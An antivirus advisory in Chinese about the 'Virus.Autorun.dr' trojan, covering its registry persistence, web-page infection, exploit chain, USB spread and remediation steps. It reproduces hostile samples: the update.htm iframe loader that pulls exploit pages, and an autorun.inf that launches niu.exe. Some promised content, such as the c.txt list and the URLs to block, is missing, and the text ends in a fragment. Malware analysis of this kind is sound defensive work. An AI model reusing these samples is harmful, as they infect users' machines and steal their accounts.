網頁收割者
病毒名稱:Virus.Autorun.dr
中 文 名:網頁收割者
病毒類型:木馬
危害等級:★★★
影響平台:Win 9X/ME/NT/2000/XP/2003
1. Virus.Autorun.dr 網頁收割者病毒採用Delphi 工具編寫,病毒運行後,會創建病毒進程:crsss.exe,該進程指向的路徑為:%WinDir%\System32\crsss.exe,檔案大小為 62512位元組。
該病毒在註冊表中添加下列啟動項:[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 字串7
"crsss" = %WinDir%\system32\crsss.exe
這樣,在Windows啟動時,病毒就可以自動執行。
2. 該病毒還會搜尋硬碟中擴展名為*.htm、*.html、*.asp、*.aspx、*.php、*.jsp 的網頁腳本檔案,向其中插入惡意網址連線,該病毒網址會利用MS06-014、MS06-046、MS07-017 等多惡意網址詳細的分析如下:
update.htm 檔案的內容下下:
<HTML>
<body style="CURSOR: url(wm/xjz2007.bmp)"></body>
<iframe width="100" height="100" src="wm/74.htm"></iframe>
<iframe width="100" height="100" src="wm/du2.htm"></iframe>
<iframe width="100" height="100" src="wm/1s.htm"></iframe>
<iframe width="100" height="100" src="wm/2s.htm"></iframe>
<iframe width="100" height="100" src="wm/3s.htm"></iframe>
該頁面首先下載病毒檔案xjz2007.bmp ,而該檔案為病毒作者精心構造的ANI動態游標檔案,利用Windows系統的MS07-017動態游標漏洞下載並且執行病毒檔案,該病毒為QQ木馬最新變種。
接著該頁面又引用 74.htm,du2.htm,1s.htm,2s.htm,3s.htm 帶毒頁面。
其中74.htm頁面利用微軟MS07-004 矢量標記語言漏洞下載並執行病毒檔案:該病毒為木馬代理病毒。
du2.htm 頁面為一採用unescape算法加密的頁面,解密後發現該頁面利用的是“百度超級搜霸ActiveX控制項遠程代碼執行漏洞”下載並且執行病毒檔案,而Baidu.cab 檔案為一個壓縮檔,裡面包含木馬代理病毒。
1s.htm 和2s.htm頁面都是採用VBScript 語言編寫的頁面,並且採用了10進制自定義函式方法加密,解密後發現該頁面利用Windows系統的MS06-014漏洞下載並且執行病毒檔案,該病毒為QQ木馬。
3s.htm 頁面採用JavaScript語言編寫,並經過16進制代碼方法加密,解密後發現該頁面利用Windows系統的MS06-014漏洞下載並且執行病毒檔案,該病毒為QQ木馬。
總體來看這些惡意網址頁面是近期較為典型的網頁木馬方式,利用了MS06-014漏洞,MS07-017漏洞,MS07-004漏洞,以及新出現的百度搜霸漏洞等網頁木馬常見用漏洞下載木馬病毒。此外,從別的病毒來看,還有很多病毒利用PPStream 堆疊溢出漏洞和暴風影音II ActiveX棧溢出漏洞來傳播木馬病毒的。繼使Windows系統漏洞後,使用常見應用程式漏洞進行下載木馬病毒將會是以後網頁木馬發展的一個趨勢。
3. 該病毒還會生成下載網遊木馬列表檔案:%WinDir%\system32\c.txt ,該檔案內容如下:
=該病毒會將這些網遊木馬下載並且執行,從而盜取遊戲玩家的帳號和密碼,給玩家帶來極大的損失。
4. 病毒還會通過隨身碟/MP3/移動硬碟的移動存儲設備進行傳播,在其中生成autorun.inf和niu.exe兩個病毒檔案,autorun.inf 檔案內容如下:
[AutoRun]
open=niu.exe
shell\open=打開(&O)
shell\open\Command=niu.exe
shell\open\Default=1
shell\explore=資源管理器(&X)
shell\explore\Command=niu.EXE
這樣當用戶在雙擊打開隨身碟的時候就會將病毒激活,從而感染到系統中。
5. 該病毒還會強行修改IE首頁,將首頁設定為帶毒網站,這樣用戶一打開IE瀏覽器就會感染病毒。該病毒還會破壞作業系統的註冊表相關鍵值,使系統無法顯示隱藏檔案。
解決方案:
1. 請將KV系列防毒軟體的病毒庫升級到9月20日,並開啟所有的實時監功能,即可攔截此病毒。
2. 建議用戶通過Windows系統的Windows Update 功能更新作業系統補丁,尤其是一定要打上MS06-014漏洞,MS07-017漏洞,MS07-004漏洞等網頁木馬多用漏洞。
3. 禁用系統的自動播放功能,防止病毒從隨身碟、MP3、移動硬碟等移動存儲設備進入到計算機。 字串6
禁用Windows 系統的自動播放功能的方法:在運行中輸入 gpedit.msc 後回車,打開組策略編輯器,依次點擊:計算機配置->管理模板->系統->關閉自動播放->已啟用->所有驅動器->確定。
4. 不要隨意接收從QQ、MSN等即時聊天工具傳送過來的執行檔,不要登入來歷不明的網址連線。
5. 希望企業的網管使用防火牆或者上網行為管理設備。這兩個網址進行禁止。
個系統漏洞下載並且執行20多個惡性網遊木馬,盜取遊戲玩家的帳號和密碼,給玩家帶來極大的損失。
